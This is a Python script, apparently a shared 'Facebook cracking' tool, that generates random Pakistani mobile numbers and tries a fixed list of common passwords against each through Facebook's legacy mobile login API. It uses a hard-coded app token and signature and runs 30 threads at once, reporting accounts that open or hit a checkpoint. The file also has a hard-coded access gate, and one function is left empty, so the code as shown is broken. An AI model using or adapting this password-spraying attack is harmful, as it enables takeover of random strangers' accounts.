# Decompiled By RandiSr
# Github : https://github.com/RANDIOLOY
# Coded by DulLah (fb.me/dulahz) --
# Recode By Ikra-18

import os, re, requests, concurrent.futures
from random import randint

import os, sys
M = '\033[1;33m'
C = '\033[1;31m'
D = '\033[1;32m'

def wa():
    os.system('xdg-open https://www.facebook.com/118462356860246')


def restart():
    ngulang = sys.executable
    os.execl(ngulang, ngulang, *sys.argv)
os.system('clear')    
print(D)

os.system('figlet "Sidraelezz"')

print( """                                                                                                
\033[1;96m[+] TooL By Sidra ELEzz
\033[1;96m[+] iS TooL Free 
\033[1;96m[+] TooL Crack Facebook IraqV3 
""")

print(C)

print('<═════════════════════════════════════════════>"   ')
user = input('\033[1;96m[+]\x1b[1;97mUserName \x1b[1;96m= ')
import getpass
sandi = input('\033[1;96m[+]\x1b[1;97mPASSWORD \x1b[1;96m= ')
if sandi == 'Iraqv3' and user == 'Iraqv3':
    print( '\033[1;97m[\033[1;92m\xe2\x9c\x93\033[1;97m]')
    sys.exit
else:
    print( 'Ohh No Contact : 03455453538')
    wa()
    restart()
os.system('clear')

lib = input("""\033[92m

\033[1;92m[1] Download Cloning tools new update
\033[1;92m[2] Start Cloning

\033[1;91m[+] Please Choice >>\033[1;92m """)

if lib == "1":
    os.system('pkg upadte && pkg upgrade')
    os.system('pkg install fish')
    os.system('pkg install python2')
    os.system('pkg install figlet')
    os.system('pkg install toilet')
    os.system('clear')
    pass
else:
    os.system('clear')
    pass
os.system('clear')
def brute(user, passs):
  try:
    for pw in passs:
      params={
        'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
        'format': 'JSON',
        'sdk_version': '2',
        'email': user,
        'locale': 'en_US',
        'password': pw,
        'sdk': 'ios',
        'generate_session_cookies': '1',
        'sig': '3f555f99fb61fcd7aa0c44f58f522ef6',
      }
      api='https://b-api.facebook.com/method/auth.login'
      response=requests.get(api, params=params)
      if re.search('(EAAA)\w+', str(response.text)):
        print('\033[1;91m[OPEN NOW] %s || %s '%(str(user), str(pw)))
        break
      elif 'www.facebook.com' in response.json()['error_msg']:
        print('\033[1;92m[CHECKPOINT] %s || %s '%(str(user), str(pw)))
        break
  except: pass

def random_numbers():
  data = []
  os.system('cls' if os.name == 'nt' else 'clear')
  os.system('clear')
  print(D)
  
  print('''
 \33[31;1m[ TooL Crack Facebook Pakistan ]

\033[1;93m[+] Choose the number
\033[1;95m[+] 0311 to 0318
\033[1;95m[+] 0300 to 0309
\033[1;95m[+] 0321 to 0324
\033[1;95m[+] 0331 to 0336
\033[1;95m[+] 0340 to 0347
  ''')
  kode=str(input('\33[33;1mEnter the starting number: '))
  exit('\33[36;1m The number must be 4 digits, no less and no more.') if len(kode) < 4 else ''
  exit('\33[36;1m The number must be 4 digits, no less and no more.') if len(kode) > 4 else ''
  os.system('clear')
  os.system('toilet -f big SOMI -F gay')
  print("""
  
  """)
  jml=int(input('''
  \33[36;1mChoose Number 03 & 92 \n>>>  '''))
  [data.append({'user': str(e), 'pw':[1122334455,1234512345,112233445566,1234554321, 786786]}) for e in [str(kode)+''.join(['%s'%(randint(0,9)) for i in range(0,8)]) for e in range(jml)]]
  
  print("""
  \033[1;93m<═════════════════════════════════════════════>
  """)
  with concurrent.futures.ThreadPoolExecutor(max_workers=30) as th:
    {th.submit(brute, user['user'], user['pw']): user for user in data}
  print('\n  Done:)')

def random_email():
  

def pilih():
  print(D)

  
  print("""
  1. \33[33;1mStart Pakistan Cracking \33[37;1m
  2. \33[33;1mClose Program
  """)
  pil=int(input('  Choose Number: '))
  if pil == 1:
    random_numbers()
  elif pil == 2:
    restart()
  else:
    exit('  goodluck')

pilih() if __name__ == '__main__' else exit('Sorry, something wrong, please try again later.')


                   
                   
                   


